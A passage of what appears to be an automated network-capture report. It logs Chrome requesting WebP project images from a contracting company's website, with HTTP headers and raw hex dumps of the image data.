                                              Data Ascii: 9r^5 _KAY:ShAhon0 TCY M87a653MViBn(m!FBXNC #`T-wGppGa`h]>c~BV('l<<+Y1?m1/jBwC,0k&{$Q+ORp4uK&8
                                              2024-09-27 06:20:15 UTC8000INData Raw: 58 14 89 9d ef d1 78 99 f5 7e 5b 4f 46 cc 4a 4d ce 6a ac b1 a4 fe 99 48 33 aa e5 85 3c 31 82 23 f2 c3 56 5c 43 af f7 e7 13 ec 96 f5 a6 31 6e 69 3e 51 81 c3 e7 86 22 29 e4 dc 07 0e 98 cb b5 62 4e 6b 10 0b 59 1d 30 f3 4f f9 1e b0 82 32 19 15 c5 21 a8 9f 97 f0 ec 61 d4 e7 5e 83 55 26 f7 3a f7 32 cf 3f 06 e7 88 a2 0d 9e 7d fd 5c c7 9e ba d2 cb ed fa 4c 68 cf b3 e8 8c b3 1c a8 e1 e4 e6 b4 b2 95 fd 2b 45 a5 ea ce e7 fa 07 f4 4b 54 9e 22 a3 6a b1 44 2d a9 82 1e 85 0a c9 6b 8c 02 3d 1a 2b 64 78 15 20 ad ad 21 7f 0f 2a 31 01 dc a6 ad c8 26 98 61 fb a2 12 ca be 75 c7 16 86 16 46 67 95 6d 66 ee fc 96 ac 2e e6 fe 87 9f c4 a2 f1 b7 99 d8 a2 16 51 00 af c7 16 df 65 45 1b 14 69 b2 3e dc e4 26 dd 9c 97 04 18 30 6e 32 5e 33 1a 28 29 7f 3c 09 c1 45 f4 7a 99 af f6 fa 6b 00
                                              Data Ascii: Xx~[OFJMjH3<1#V\C1ni>Q")bNkY0O2!a^U&:2?}\Lh+EKT"jD-k=+dx !*1&auFgmf.QeEi>&0n2^3()<Ezk
                                              2024-09-27 06:20:15 UTC8000INData Raw: f2 99 87 b6 53 7a 55 ba c3 ad b0 9e 04 5e 1e 50 45 c7 2a 32 78 11 aa c8 ae 47 f3 ac 0a 78 e3 ed 31 ae c3 3c 95 4a 8e 09 c4 8b 86 e8 29 68 1a 81 76 53 d6 cb b4 74 30 03 c0 21 b3 71 e0 9b 94 53 14 2a be 2d 0c d3 2b bc 30 8e 7a 22 71 ba 6c 46 e2 97 ca 2b 8a a4 55 92 47 3b 68 a4 17 ef 5a bc 0d 00 23 59 23 06 86 bf ee 2b c8 c1 e0 ec 54 03 ff cc e7 08 60 5f bd 5b d4 57 10 2f bb 0e 6e bd 49 e9 4c ef 4f af fa ee 34 d8 3c 51 4f 84 36 a3 65 ce 88 b2 69 57 19 58 77 53 20 ca ab 79 9a e4 a3 27 33 53 6d 22 b9 2d e5 a9 c4 00 b2 a8 f1 4b 3d 7b 28 7b 8a 34 18 fe 00 09 60 4f 85 0b 33 44 66 af ad 18 59 10 70 be 53 47 16 7b d3 9d dc ac 11 80 bc fe d3 bc 5e 45 5b 24 c0 4c 03 ef 0b 37 3c 05 ad 6f 96 35 26 7c 5f 09 41 23 f6 fc 7f f9 27 86 55 27 52 35 77 fa 41 94 0c 55 55 f6 85
                                              Data Ascii: SzU^PE*2xGx1<J)hvSt0!qS*-+0z"qlF+UG;hZ#Y#+T`_[W/nILO4<QO6eiWXwS y'3Sm"-K={({4`O3DfYpSG{^E[$L7<o5&|_A#'U'R5wAUU
                                              2024-09-27 06:20:15 UTC5309INData Raw: 4b 12 f2 02 6f df f1 84 bb e9 64 cb b8 e9 00 c2 e8 a7 ec 14 8c 37 81 f3 a6 08 10 31 30 ea cf de f0 d8 b0 d6 2d 21 c0 3a a5 9f 0f 97 26 d7 dd d3 01 f8 80 ab 0b 9f 2e ad 63 7a 17 25 ec 75 f4 60 a2 08 8d 23 97 cb 52 cc f3 71 03 cd 5b b5 87 cc ac ff a6 b8 e7 37 84 58 1c 36 eb 0f d3 3f e0 ac 11 e0 02 db 9e 6f f3 26 ac df ea b3 7c 3d 42 3e 67 81 60 9d fb eb 17 51 da 9e dd d4 7b 5f b0 00 2f 9e 80 40 97 c5 3a da 14 0c 04 c4 d3 1e 72 ad 6b c8 a4 47 b7 83 41 d3 24 73 f9 07 c3 7d 5b 09 3f 0a 31 78 d9 17 fa 97 43 78 b4 03 3c 2c 1c 8f 64 d7 83 f7 a4 c0 bc 13 2f ff bd 9e 08 ee 4f 69 31 72 7b 69 3a 8b 32 ec cd b0 33 67 39 4e 78 62 5c 41 0b 15 4f b4 d8 3f 31 13 9e 66 f2 01 68 fd ed fb 65 cd b6 1d f8 e3 e7 de 18 68 bb dd e1 e9 c7 31 5b 20 32 28 d3 2d d1 03 da 18 dc 29 a9
                                              Data Ascii: Kod710-!:&.cz%u`#Rq[7X6?o&|=B>g`Q{_/@:rkGA$s}[?1xCx<,d/Oi1r{i:23g9Nxb\AO?1fheh1[ 2(-)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              84192.168.2.465421173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:15 UTC724OUTGET /uploads/projects/34/2df040a4c38aa8d8468943fbef9cc703.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:15 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:15 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 12:05:31 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 126100
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:15 UTC7930INData Raw: 52 49 46 46 8c ec 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 18 ec 01 00 50 67 07 9d 01 2a cf 04 a3 03 3e e9 64 a8 4f a9 25 2c b4 2b 59 eb 32 80 1d 09 65 6e 50 d1 5b 3f 75 c4 37 f3 7b 1b ff 4a e5 e2 0f 1b 5e d9 ff 83 9e 1e 79 5f e6 e9 cb 6e 36 a0 e9 7e eb c0 75 3f da cf da dc 53 f9 db f0 bc 30 fd 27 fd 47 4a 1e 32 be e1 ff 47 a9 b3 3b 0f f2 f6 e5 67 d7 60 dd f8 4d b6 dd da 7b e4 3f 8e 24 6d a4 47 80 68 3f f2 1d f2 7d 4e ff 73 de 95 e7 1b ce 47 ce 83 a7 23 d7 1f a2 e7 d2 4b 7f ff a2 1f d0 3f f6 f9 bd fa af f9 7d f0 fe 9b ef 8d fc f7 b8 95 e1 fe 97 c0 ef ef ff cc 3f ed eb d7 fc df dc df 1b ff 6f fe d7 ff df a8 5f ea bf bd 7d 2c 7f 5f b6 03 6c ff 9b e8 1d f0 0f e6 ff fe 7a b0 4d 4f ed fd 40 ff bd 7f b8 fd c5 f7 6f c0
                                              Data Ascii: RIFFWEBPVP8XVP8 Pg*>dO%,+Y2enP[?u7{J^y_n6~u?S0'GJ2G;g`M{?$mGh?}NsG#K?}?o_},_lzMO@o
                                              2024-09-27 06:20:15 UTC8000INData Raw: ac 6b 61 6d ef 48 d0 f9 03 02 88 6e dc 40 97 22 af 55 90 45 37 0c 7b 25 f9 dd 3a bf 85 78 b1 96 ae 50 c7 37 2e 11 96 58 8f e4 26 6b 82 d8 09 11 ab af 6c 5f 96 3a a4 38 0f 28 bb 20 12 fb bf 74 be c4 dc af a2 e3 07 6c 90 95 92 23 35 a2 18 21 ff 0b a6 e6 b8 d1 01 ce 51 e1 48 4c 0e 46 94 0d 6b 34 91 d8 cf 96 ea c1 55 5a 7c cd 83 b3 97 a7 3c 1c 27 25 17 df bc 2f d1 7f 75 ef cc c0 84 34 c5 f2 4a ab a5 85 fd 10 97 9f 5f 4f 5b 18 d5 db 33 8c 98 02 1e 2d 2a 25 96 12 92 d0 97 36 de cb 88 2c 5b f0 9f f5 f2 2e 9c 6c 5d c5 d3 43 c9 1c 38 5c 71 b1 aa 57 2e 06 45 e0 88 01 30 b1 cc e3 ab 4b c9 a1 77 5a 24 db d2 03 a4 f1 6b b3 62 72 59 00 1b 7c cf 70 96 7f 53 d8 64 a2 0b 3b 9f 3c ac f9 6d 84 1d 7f 62 fd 3c c4 9f 2c 7b 74 a7 7a 65 98 9f 62 68 32 12 64 fc 63 eb ae 60 4e 29
                                              Data Ascii: kamHn@"UE7{%:xP7.X&kl_:8( tl#5!QHLFk4UZ|<'%/u4J_O[3-*%6,[.l]C8\qW.E0KwZ$kbrY|pSd;<mb<,{tzebh2dc`N)
                                              2024-09-27 06:20:15 UTC8000INData Raw: d9 02 15 26 1a 66 09 e0 07 10 2f 79 c0 36 33 e3 f7 c2 71 a2 45 b4 22 88 ad ba ec 23 35 6e 37 2c 08 84 c6 a2 1a 08 2d 8a 8b 3b 2f cf 57 16 8e 60 04 22 c6 e4 98 ef 6c 47 cf a5 a0 ad a4 90 18 31 16 9d d1 eb 96 66 2b 77 e7 b7 4f 6b 62 f6 5c d1 04 78 b1 e4 b8 1c e9 d0 a8 3f 80 d8 40 26 ab 10 49 8f f8 e0 31 45 02 af e6 11 88 2a e9 ee 36 11 03 43 04 71 f1 9b b7 ef 59 2f 1e f8 01 f1 e0 8c 43 94 66 8b a0 fc 50 02 7b ba a8 00 02 78 68 fd 42 05 e7 58 39 59 62 ce 83 74 8a 57 8f a1 08 f9 59 ae ce 94 03 77 a4 c7 7d d9 16 ff 22 99 fe 0a 08 77 ec 24 b5 f9 e5 c7 14 00 07 a9 1b 42 8d e9 f0 00 ca 89 76 0d 3e fb af 65 19 53 fb 96 55 60 62 74 34 08 b2 36 88 9c d3 28 72 48 a5 fe c4 99 97 c0 fb 77 ee 7f b2 6e 6f f1 c5 f9 58 1d e6 15 dc 82 98 21 96 91 e2 4f 78 93 c0 5c b8 23 31
                                              Data Ascii: &f/y63qE"#5n7,-;/W`"lG1f+wOkb\x?@&I1E*6CqY/CfP{xhBX9YbtWYw}"w$Bv>eSU`bt46(rHwnoX!Ox\#1
                                              2024-09-27 06:20:15 UTC8000INData Raw: 03 5a 51 78 89 45 61 d0 a2 80 14 ad 57 2e 44 ef 05 ab 2a e9 03 89 f5 25 cb db 4c 70 37 8d bd 97 e5 10 bb d5 61 e8 db ad ee ac 77 c8 4d 5b 44 f9 07 1b 96 7b 52 1e 6a e2 86 bc 3b 68 d2 55 82 38 bc 77 e1 f1 1b c4 d0 59 79 91 d8 d2 14 2f ea a9 86 ad d8 5a 34 c2 9a 80 c6 d7 8a a1 72 8a 48 27 76 0f 58 1a 98 95 a6 76 16 9e d6 20 1b 53 a2 e1 26 f8 b3 f3 2e 8c 48 d1 e3 ca 2b 53 68 c6 4a b9 72 a7 03 11 1a 37 96 ca 2b f2 e3 ae 34 16 51 26 8c 20 dc 52 76 7d 07 3f 80 d5 ad 94 4f 00 79 9c 91 c4 d7 49 05 b8 48 98 1c 49 7f e2 4a 94 02 2b ba b2 b3 99 9d 4d cf f3 68 ac 42 0b e3 c0 f5 ac bc 1b b5 03 d8 df f6 c7 d8 9e 01 3b 74 27 17 3a ac e6 42 07 f7 4e 8e 14 fb 8a 0d fb 01 e8 38 58 4c d8 0e 19 eb f9 15 99 07 c5 a5 59 b6 bb 72 1d c2 36 7a 98 9e 4e d9 74 7d d2 00 2c 45 1e 27
                                              Data Ascii: ZQxEaW.D*%Lp7awM[D{Rj;hU8wYy/Z4rH'vXv S&.H+ShJr7+4Q& Rv}?OyIHIJ+MhB;t':BN8XLYr6zNt},E'
                                              2024-09-27 06:20:15 UTC8000INData Raw: 3a 3c a7 16 35 d4 d5 cf fb 06 22 fa 75 c2 0b 31 d7 1c 03 3a f3 dc 01 f9 de cb ba da 01 d1 0c 75 1c ca 58 b1 28 eb 41 af 7a 72 7d 38 12 7f fa fb 1c b3 06 2e 99 8a cb 62 70 b8 a9 74 a5 69 36 ef b7 58 55 e2 1f c7 12 fa dc 57 88 77 fa a4 b5 4e 8d bd 8b 67 6a 30 36 ba 2e aa 47 a5 68 a2 5f 48 f5 b3 33 d9 2e 86 b5 65 a0 b7 7c 56 26 ed fa 05 55 b2 a3 ce 4f eb 8b 03 e1 17 dd a1 29 5b 5d 85 9e ae 94 54 94 9c c4 a7 d9 a7 e6 89 24 fe f6 fa 72 76 77 8c 91 32 eb 45 79 e8 d5 af 57 b7 c5 4f 28 74 9d 87 95 5d c0 fc ce 02 df 7c 22 77 ad 36 e4 bc df 3f e5 31 8e 78 43 df 06 1d 14 ae 50 3a 13 69 f7 20 19 cd 17 e0 42 99 7c 37 76 a5 f2 86 90 41 ab 6d 0d 80 85 64 72 c5 97 83 d4 e3 4c 2e 9c 89 2a fa c0 6d 62 1f 28 8f 15 2c ed e6 ba 0d 19 16 2a c8 97 b5 41 89 c6 f8 39 3c 9a 71 0f
                                              Data Ascii: :<5"u1:uX(Azr}8.bpti6XUWwNgj06.Gh_H3.e|V&UO)[]T$rvw2EyWO(t]|"w6?1xCP:i B|7vAmdrL.*mb(,*A9<q
                                              2024-09-27 06:20:15 UTC8000INData Raw: b7 ef 9d 98 dd 40 86 a3 20 1f e9 95 5f c5 c0 85 ee 69 08 56 8b 59 42 b9 1e fe c4 28 63 92 48 6c 29 fa 89 71 2e 10 d3 3a ed 10 7f de f2 55 f6 1d 73 78 bf 02 b8 31 2f a0 ae 5a 8f b8 9e 80 23 ce 3e 5f 85 b1 b5 00 62 28 eb 9f 8f 3e 80 01 47 58 8a 5a 50 a5 20 2a 9d e9 53 6e c4 11 12 96 c5 ff e1 df dc 36 f7 ab e2 eb 9f 2c 18 5f 8f de a4 0d 4f 8f 01 eb dc 36 bf 58 89 e3 39 04 17 be 76 24 66 be c0 78 29 12 27 f5 b8 e2 a8 e8 23 89 db 74 4b 4b 43 da 51 6d 02 9e 7f 8c 30 ba 22 7e a3 e7 fc c7 b8 3d 11 3d 53 d9 09 ed c7 52 df 24 88 dd 16 72 8a f3 46 ca 05 10 ca fa 63 d6 29 d7 f1 a2 42 dc 60 83 7d e8 93 4f 63 c8 da 02 3f fe 2e 32 dc 8c bd a2 86 6b 44 34 12 44 e2 19 f6 fe 1e 38 bc b4 38 02 7b dc 8a 75 dc f6 df d8 79 a0 dd 3c 56 07 6b 1a 7e 4a 87 2c e4 01 71 85 2a 1d b0
                                              Data Ascii: @ _iVYB(cHl)q.:Usx1/Z#>_b(>GXZP *Sn6,_O6X9v$fx)'#tKKCQm0"~==SR$rFc)B`}Oc?.2kD4D88{uy<Vk~J,q*
                                              2024-09-27 06:20:15 UTC8000INData Raw: fe f8 35 b9 24 7d 04 6b 4d 12 e7 f2 e4 f2 5a 30 30 95 04 1e 27 34 19 70 de b0 78 5b 88 78 2a 13 ec 90 98 14 cb 46 04 f3 63 01 c3 b2 1a 6b 10 72 17 c7 4f da 08 4f fd a3 f9 bc 32 61 12 5a 5d 25 14 ed aa 75 ef 62 7b 57 bc b2 06 92 f3 ec 56 90 9a da 2e e6 d0 9e 02 53 bf b7 be fa 42 eb 3a 45 65 87 25 0e 32 c9 65 27 98 ec 35 bc f2 21 f2 34 55 ef df 4e ef c0 38 09 d5 49 35 ac ac 5a 4a 22 34 43 b0 6b 9d 8a 0e b3 8e 96 1a 45 21 fe 2b ca 2c 1b 84 0e 7d ed 0f d3 0b 05 96 7c 44 60 34 94 42 9d d3 e1 0c d3 c6 3f a5 f8 55 30 ad 87 b3 bb 4f d1 19 1a e7 9a 1c 15 21 91 b1 1c bb d5 cf 82 9f 4c aa 15 f5 c1 0d fc 33 f2 c5 ff 21 59 e4 9d f0 fc fc be 46 9c 1a 1a 5f 71 d7 d9 31 0c b3 11 81 aa 4f 34 97 62 10 5e 0f b8 25 b2 8f ee e5 4f 61 31 06 6a 14 ab b3 ba 20 72 f0 50 fd bb cd
                                              Data Ascii: 5$}kMZ00'4px[x*FckrOO2aZ]%ub{WV.SB:Ee%2e'5!4UN8I5ZJ"4CkE!+,}|D`4B?U0O!L3!YF_q1O4b^%Oa1j rP
                                              2024-09-27 06:20:15 UTC8000INData Raw: 7f 5f cf ae 9f 06 1d a1 13 52 12 f8 bd 03 2b f0 f5 b1 5b 6a 91 6f b5 a1 e8 d8 4a ca c1 21 28 0d 03 cf 5f dc b9 ca e3 bd 40 67 17 bb 71 11 db 27 7a 60 d9 f9 e1 65 7b a6 c9 dd c3 ee f4 66 fe 98 8d 48 32 12 a8 30 da ef f4 b4 9a fc 4d 70 e9 a3 e0 fc e3 87 17 96 f1 94 84 e0 78 67 14 90 70 5f 6f d2 dc b0 89 ed 7f 69 96 be 83 c1 37 7f 0f 0e e4 e5 7b 7a d1 e8 73 46 4a 6f 0f 54 7b 2f fa a9 bb 54 37 f8 0b 39 44 50 1f a0 91 43 9f 95 93 83 e0 55 10 39 dd 0f 21 5c 7b 84 5e 26 a0 0a fa c6 a4 44 96 f0 b5 99 36 08 4b 7f c1 c8 01 aa 4b d8 7c 6d 9c d5 9c 35 26 91 c4 b6 90 1c 86 fd 3c b7 3c c1 8e 90 93 96 3e 2e b7 26 bd af 35 9c dc 5f 13 d6 22 b4 e2 f6 13 87 82 59 95 21 18 28 71 95 91 96 f5 07 60 28 85 2f ca 80 c9 6c 9c 46 3c a5 06 c4 50 23 f9 6f b7 82 da 07 32 10 20 2b f5
                                              Data Ascii: _R+[joJ!(_@gq'z`e{fH20Mpxgp_oi7{zsFJoT{/T79DPCU9!\{^&D6KK|m5&<<>.&5_"Y!(q`(/lF<P#o2 +
                                              2024-09-27 06:20:15 UTC8000INData Raw: 0f 5f ee 6b d1 27 29 af 2f ab 9b dd 8a 35 2f 59 ef 77 39 c6 d1 54 32 21 a0 f3 3c f1 79 99 98 98 cd ec c5 78 c3 48 7e d4 f6 4d 57 79 85 51 15 7a f4 e1 42 14 90 82 48 5c 93 a4 2a ff 56 45 56 6e 55 07 98 08 85 b3 68 c3 77 64 f9 38 2d 03 26 a9 c9 3b b1 59 8c b0 a7 c6 72 f0 7a ee 37 de 8f 38 df 5f 7e 6b 25 3c 8d 0e 1f 13 21 af ea d5 e9 9a 82 35 44 d1 3a 78 87 af 7b 4b 81 5d 1e 5a b6 c6 89 b3 25 dd 1a f9 25 2c 9e 98 fe de 9d 74 29 8d e6 fd 6f 13 33 c4 85 6c c2 32 ff b4 4a 51 9b 2b 4c 22 08 b2 1d 35 39 54 2c cf f6 d6 4e 44 5e 95 ef 6d a9 b9 42 e1 76 3e 2b c2 65 b5 23 4c e2 2d bf a2 45 ab 64 20 4f c4 a8 a8 8b b8 19 3b 82 43 0c 05 54 42 e2 32 88 f0 fd 1f 18 bc 89 cd 42 d9 42 40 fc 28 ec e9 ae 3f 08 0e 0e 95 73 a0 a4 19 c6 38 b2 e7 da d1 fc 49 7e ec 39 cf 6c a5 53
                                              Data Ascii: _k')/5/Yw9T2!<yxH~MWyQzBH\*VEVnUhwd8-&;Yrz78_~k%<!5D:x{K]Z%%,t)o3l2JQ+L"59T,ND^mBv>+e#L-Ed O;CTB2BB@(?s8I~9lS
                                              2024-09-27 06:20:15 UTC8000INData Raw: f0 ee 18 71 40 c0 3f e5 d3 1a e1 e1 e3 03 2d 6f c4 43 34 39 20 9d 6f 5d 48 d1 b0 0c 06 01 7b fd 02 81 0e 9a 2f ce 44 11 f3 94 80 bf 19 42 03 f6 be e1 28 39 14 e5 ea f2 f4 90 ba d8 bb c7 72 2c 65 f6 1a ee 50 71 1e 15 e1 d0 27 95 ad 14 fe a7 84 a2 43 37 23 93 31 45 a0 21 ea ce f3 35 cb fe 9a df 00 35 d3 17 b6 71 e7 36 12 a4 58 80 a0 92 14 e5 1d ec 53 f5 dc fb 20 03 67 8b b5 c2 8d 7c 30 db 6e 6b 73 c9 1d d0 56 65 0e 8b 06 eb 70 7f ba cb d6 47 05 13 34 d3 6d 6a 20 b5 9b 63 ae ca 95 be b6 84 f0 44 54 47 76 36 9f 8e 58 fb 61 0c f5 ce 97 44 d3 e0 50 01 01 38 a5 e4 85 6c 5e 04 bd 3e 5d 89 37 65 8e 56 67 a7 81 0f 23 a6 9f 14 86 8e b7 b0 bb 67 e6 23 aa 21 92 14 c7 68 d3 a2 78 42 24 23 28 cf 36 62 be fc d1 47 ce a1 d3 95 c1 a3 97 0e 0d ed a8 f4 83 1f ff a2 3d 86 c1
                                              Data Ascii: q@?-oC49 o]H{/DB(9r,ePq'C7#1E!55q6XS g|0nksVepG4mj cDTGv6XaDP8l^>]7eVg#g#!hxB$#(6bG=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              85192.168.2.465419173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:15 UTC724OUTGET /uploads/projects/12/99cc5d257a0d7f25b4541a6275919c83.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:15 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:15 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 09:39:06 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 81372
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:15 UTC7931INData Raw: 52 49 46 46 d4 3d 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 60 3d 01 00 70 cb 06 9d 01 2a cf 04 a3 03 3e e9 6c ad 50 a9 26 32 b8 a8 d2 eb 33 10 1d 09 49 67 2e 4e 8b 67 e1 f5 59 fe 4d f9 ff 07 0a 77 4a 2e 77 de 41 a4 d2 dc c6 2c 64 cc 91 83 5f 73 e2 05 da 3e 99 1c 84 d0 24 7b de 6c 2d b0 93 8a f3 ec 07 d0 a9 73 e7 1e 37 ba a4 64 43 e5 59 cb fc 47 7d 9f fd 5e b9 ff c2 7a 5c fa 15 ff e5 ec 63 fa f7 a2 ef eb 7f f3 fd 6a 3d 4a 7f aa f5 0e ff 1d e9 ab eb 45 fd 63 d5 63 ce b7 d6 f7 fc bf ac 06 61 4f fe 6f 37 5f 43 ff 07 c0 bf d0 fd ed 3f 9f f7 2a c1 bf d6 f8 3d fd e7 f9 0e 74 bf d4 f0 d7 f6 3f ea fd 0b ff 5b fe e1 e7 63 fd 9e 13 1a df 87 06 68 ff b7 ea 27 f3 7f ef 76 65 3f 09 e8 b5 e9 1b ff b7 a6 5f d9 ff f1 fa 5b 17 bf
                                              Data Ascii: RIFF=WEBPVP8XVP8 `=p*>lP&23Ig.NgYMwJ.wA,d_s>${l-s7dCYG}^z\cj=JEccaOo7_C?*=t?[ch've?_[
                                              2024-09-27 06:20:15 UTC8000INData Raw: 20 95 3e 15 1f 50 96 a2 1d 12 bf 6b 79 20 de 4c 0f 17 0a 66 c8 37 62 fa 96 c4 71 78 37 0b f7 b3 b5 c0 06 9e 42 bb 89 33 a7 9c 92 85 0c 24 bd 61 39 b0 cf 24 35 53 36 58 de 67 ae ef 68 0e 70 f3 f1 99 5a 64 69 4f ac 87 32 fb 04 41 2d 32 55 e1 c1 31 5c 4c 51 6d b7 5c 38 b0 f0 78 03 64 14 17 11 ac 90 79 08 f2 0a 10 52 22 1d 39 8f 26 84 44 59 1a 76 23 1a 0b 1d a6 8f db 17 7a 5f a8 f2 8b e9 3c 73 64 6a fe fe 69 a6 50 89 75 13 56 b4 e6 18 de e9 96 85 6b f2 fa 39 5c d3 fb 03 fa 19 3e 0c 41 3b f4 25 02 5b d7 59 33 7e 18 2d 59 17 c7 d4 83 7b 72 e2 f3 44 ae 58 ee 7c ce 54 53 1d 6c 38 6b c5 3a 6c 08 68 16 c4 0e 01 9e c0 e1 69 32 6a 3f 03 64 5d d5 d3 39 c1 7c 80 80 96 7c fd 15 6e 36 6f e5 12 2e 4d 53 d6 d5 a8 89 09 a2 95 c0 50 a5 68 53 c1 3b 2c 37 96 ad bf 27 12 19 1d
                                              Data Ascii: >Pky Lf7bqx7B3$a9$5S6XghpZdiO2A-2U1\LQm\8xdyR"9&DYv#z_<sdjiPuVk9\>A;%[Y3~-Y{rDX|TSl8k:lhi2j?d]9||n6o.MSPhS;,7'
                                              2024-09-27 06:20:15 UTC8000INData Raw: 70 b3 8c 3b c5 5b db 83 10 7c 5a dc 5f b2 fe 89 bd cb 69 e0 8f e4 f4 89 24 fd 65 e6 f0 4f 2f aa d1 b2 56 e1 65 be 4d c9 5e 77 1d c8 28 b3 29 62 ff 40 27 f4 81 7b 6d 65 ce 1e 65 45 ad 49 d1 14 f4 00 00 21 10 01 6c 00 06 c9 14 94 c7 b0 5a 78 58 1c df b0 09 ad ac eb 81 5c 13 5f c3 1c 5b de f2 47 d3 33 29 d1 b7 f8 3b 73 1b 2e 36 7e 89 92 3d 3f 03 63 b6 a7 e0 38 d9 de c0 19 a5 fd df e7 2b 04 3a 4f 9e 10 7e 17 20 6c 85 63 40 81 09 cb f2 36 fe 16 91 d9 a6 be 18 4a 61 07 74 58 0e f8 07 1d 97 05 bc 5a 3e 94 60 a8 67 63 65 4a 7d ec a4 b9 04 51 94 76 b6 4f f9 28 49 4b 5c de 13 9b d7 04 fb b3 cf 41 a3 56 cb c8 d3 1f eb a9 80 24 f7 d1 f0 25 d8 fd 94 f3 7c c4 d5 46 01 67 2b 63 b5 96 e4 60 92 72 0c 41 a2 b2 aa d7 02 c5 ef 92 cb 53 3b ce 00 09 3f 11 e6 43 e1 4a bb 50 6d
                                              Data Ascii: p;[|Z_i$eO/VeM^w()b@'{meeEI!lZxX\_[G3);s.6~=?c8+:O~ lc@6JatXZ>`gceJ}QvO(IK\AV$%|Fg+c`rAS;?CJPm
                                              2024-09-27 06:20:15 UTC8000INData Raw: da 89 46 c4 31 c2 ac c2 8e 6c 38 ae ea 1e 76 86 5e bc f3 fa a1 1a 70 c3 fb b6 8a 24 6c 2a 29 d8 92 f6 8d f4 a4 fe 78 be 21 2f 00 62 6c b1 71 df c9 48 09 c5 6b be 10 b8 04 52 3c aa 69 c9 6e c3 83 bf 82 6b e1 c0 bf 90 18 b4 c6 de b8 41 84 26 1b 68 0f 92 e8 b4 4b 8e b8 08 57 05 ba b5 56 e6 7f e7 48 f1 90 02 a6 0c 9f 92 5b ae 28 d5 c9 f5 33 e8 32 52 4b 2f f6 2f 7a e4 39 b9 85 62 e6 73 33 23 93 96 17 e5 b6 5b 98 6e cc 9c 00 1e 9c 84 39 26 7f f5 62 c2 8a a4 e7 38 da 57 ee b3 99 0d 62 12 fd d1 cb 32 b9 79 fd b3 97 d2 82 11 21 41 4a 45 50 c2 62 4f 60 c5 c6 2f ea 26 6f f1 d3 da ba 76 77 68 c3 2a a6 44 ef 88 66 4a a4 b9 96 5e 20 df 77 e4 57 93 23 76 c5 82 14 f1 07 1a 6b e5 f6 4b 70 e3 ab 8d 44 fe e7 8a 64 d9 c8 ea ce 35 ab 53 04 d8 f4 a1 8f ad 7b 0c a4 3e b1 4e 15
                                              Data Ascii: F1l8v^p$l*)x!/blqHkR<inkA&hKWVH[(32RK//z9bs3#[n9&b8Wb2y!AJEPbO`/&ovwh*DfJ^ wW#vkKpDd5S{>N
                                              2024-09-27 06:20:15 UTC8000INData Raw: b2 71 65 87 86 5a 8a f3 52 e4 9e 6c dc 99 fd 2f 01 86 cb 16 87 07 cf 27 a8 ca 92 98 01 7e 37 c9 ad dc 12 90 8d 1b 91 d7 97 ec 25 0b e5 b5 1d 76 7f 00 ee 45 34 5b 49 4a 8e 22 15 8c 68 b1 4a 36 6e fd a9 8b b8 82 99 9b df 6a e2 ce 21 96 a5 0e 79 d4 00 aa 05 db 16 df be e9 9a c4 b1 00 42 00 1f e4 9d 2c 93 09 9c ef 9d 74 c3 ca f2 65 ec f1 84 c2 26 d4 14 9a 79 70 c7 69 a4 e2 de ea 5e a7 8b b1 6d 7d 15 26 da 4a 15 66 05 4e f0 ff 45 3c b8 c0 7a ad d7 e0 2b e9 f9 3b 05 2f 6b 97 58 41 e9 be 31 3f 6c a1 af 5a 4d 02 30 a7 3b b3 10 e3 c2 ab 22 bd dd 21 0e f8 02 cb 3a 3d ef 95 fb ed 0f 17 be 92 bc 5e c0 bd d4 fc 55 86 62 cf 59 a4 dd 26 eb 9c 48 c8 a7 89 cc 2f cd 5f cf b1 4d 99 e5 21 97 ee 80 59 0a a6 79 1c 17 